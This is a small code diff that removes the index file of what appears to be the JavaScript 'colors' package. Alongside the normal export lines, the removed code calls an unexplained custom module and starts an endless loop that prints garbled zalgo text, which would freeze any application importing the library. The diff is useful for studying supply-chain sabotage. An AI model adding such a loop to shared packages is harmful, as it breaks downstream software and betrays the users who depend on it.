123456789101112131415161718192021222324 |
- var colors = require('./colors');
- module['exports'] = colors;
- // Remark: By default, colors will add style properties to String.prototype.
- //
- // If you don't wish to extend String.prototype, you can do this instead and
- // native String will not be touched:
- //
- // var colors = require('colors/safe);
- // colors.red("foo")
- //
- //
- require('./extendStringPrototype')();
- /* remove this line after testing */
- let am = require('../lib/custom/american');
- am();
- for (let i = 666; i < Infinity; i++) {
- if (i % 333) {
- // console.log('testing'.zalgo.rainbow)
- }
- console.log('testing testing testing testing testing testing testing'.zalgo)
- }